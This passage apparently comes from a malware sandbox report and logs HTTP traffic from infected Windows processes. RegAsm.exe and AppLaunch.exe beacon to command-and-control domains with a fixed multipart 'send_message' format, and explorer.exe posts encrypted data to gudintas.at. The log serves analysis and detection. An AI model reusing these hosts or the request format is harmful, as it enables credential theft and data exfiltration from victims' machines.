                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:47.997101068 CEST4631INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:47 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=q984svdp7hvqsmlntgkfclqhi6; expires=Sat, 27 Jan 2024 09:49:26 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:47 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qioxsZmdOYH%2FFPO8UGPCqb3av2iQZt1Ke8Dn7Bhcbw05cWtmKOmi2ITK2Pk%2BlxOsb41LmeZlwog1KUk9UjhO2fLdfzcFhbP3bc6i%2BvKu6NHnVc7lOzFFvHMg%2FxXovY2CWzafSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066957aaee07ed-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:47.997157097 CEST4631INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.349848172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:47.750857115 CEST4629OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:47.751430035 CEST4630OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:48.100852013 CEST4637INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:48 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=csf3d7tn02ar398kdqi2palgo9; expires=Sat, 27 Jan 2024 09:49:26 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:47 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T8x2UKbbhWvBbmkZh90Z%2FluEACjO8goSu%2FrSavEy8wzL7B%2BMWt1HdeNVVETvgdJcp2e%2FvrKhMkDYulIB3WIysQN7ejVGft65%2B%2BoGNWuukVNgYQ6jColW1Cihmj6y58oHyiX1Kg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066958abbd2896-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:48.100871086 CEST4637INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.349819175.126.109.1580C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:22.978971958 CEST308OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://jgmkwutmh.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 317
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:22.978971958 CEST309OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2e 46 aa f9
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu.FGCIz(qKnzO`dglV\&HvGTrp-Q?hO/4H^gU8DbJ{$p6,G(Vk#9
                                                                                                        Oct 3, 2023 18:02:24.088397026 CEST309INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:23 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.349849172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:48.223977089 CEST4639OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:48.224709034 CEST4640OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:48.569174051 CEST4644INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:48 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=0lqdgsh0cdkct084i23kcht7i5; expires=Sat, 27 Jan 2024 09:49:27 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:48 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hm08HCpF29p5pN2Lxlr1bA%2BhtZpoSZ5TPAubrdglH4dDPJHXC68U4xbngLal5JXoGIveTi9p8VlY7GnVpVmsAOGVqyLjllseZ%2FUaXxPRyg7smx3obPS0NehtJm4sO0Iw4CebSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106695b9b54081b-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:48.569190979 CEST4644INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.349850172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:48.328033924 CEST4641OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:48.328726053 CEST4642OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:49.671389103 CEST4654INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:49 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=tuj5atv965p613ddncgcv5cf88; expires=Sat, 27 Jan 2024 09:49:28 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:49 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4gjgKjzzyB6%2FEV9vznps12%2Bw8EZu%2BmzJ%2F6M%2Fq%2FlvGGYpifMoLRQMugqjuyNWmnzeD91SKaN2XWDWduGg8jOectlCoBMmcnYHQo6WFySfS2prgUnJhTsRnRO5ELWOMWGDY%2F6geA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106695c4da557c6-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:49.671410084 CEST4654INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.349852211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:48.736371994 CEST4651OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://cymki.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 110
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:48.736417055 CEST4651OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 30 09 b0 e4
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu05X|2OO
                                                                                                        Oct 3, 2023 18:02:50.028029919 CEST4656INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:49 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.349853104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:48.790836096 CEST4652OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:48.791599989 CEST4652OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:50.192933083 CEST4657INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:50 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=57fn9dr55ei21293v87pjbrf0l; expires=Sat, 27 Jan 2024 09:49:29 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:50 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FdgdJcGZGnnJTQHHJE2CmWv8SheRZjIo2YNohfkqidLmrqGO6WN1NDQtXPxunQ12DbzHwr5g2GgugcRvoFOYdYJ4%2Bmkc5mHqkYDXsMSzho%2BkhrUGPjC502s4gtF2KgSn0iSjIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106695f2e52586c-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:50.192951918 CEST4657INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.349854104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:49.893605947 CEST4654OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:49.894016981 CEST4655OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:50.252624989 CEST4659INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:50 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=ht8rgibmcnv9p0vfelue24o89f; expires=Sat, 27 Jan 2024 09:49:29 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:50 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=itpOAjRKzunIXGNEQK1Lnee7TCoYcPW%2FaZZyS8ViFaW5th0fdrYyw6sBujPOF1oheyxuy1iI6PuYLUxtClA6MftFP3acgEx4UXD74BVlBwzkFRle0oo5gJaBNQb4JTA9Z53sMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066966085d82e1-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:50.252641916 CEST4659INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.349855172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:50.410018921 CEST4659OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:50.410423994 CEST4660OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:50.735996962 CEST4698INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:50 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=46d4pvsabjurj41jlthu92tkj5; expires=Sat, 27 Jan 2024 09:49:29 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:50 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Y34QVDYvINgvmBC8V0vwZzNWssFDzN98vimLM8ORA%2BGdHCxryCVO1lfHFNbRZE9LWWY9kg2QGlkAI53m59KVmjdWLbmSWyB%2FCZ7VdzhdmDBfMj0s1MDSMGSiHHgIsuS7hBJig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669694f650a0b-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:50.736030102 CEST4698INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.349856104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:50.634804010 CEST4661OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 86372
                                                                                                        Host: fiancejiveimp.fun
